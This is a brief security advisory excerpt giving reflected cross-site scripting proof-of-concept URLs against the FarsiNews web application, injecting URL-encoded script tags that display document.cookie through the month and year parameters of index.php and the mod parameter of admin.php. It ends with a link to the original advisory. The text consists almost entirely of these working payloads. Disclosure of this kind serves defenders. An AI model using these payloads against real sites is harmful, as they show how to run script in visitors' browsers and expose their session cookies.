XSS attack:
http://[target]/[farsinews_path ]/index.php?month=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!
--&year=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!--

http://[target]/[farsinews_path]/admin.php?mod=%3E%3Cscript%3Ealert(docu
ment.cookie)%3C/script%3E%3C !--

Original Advisory
http://www.aria-security.net/advisory/farsinews/farsinews0420062.txt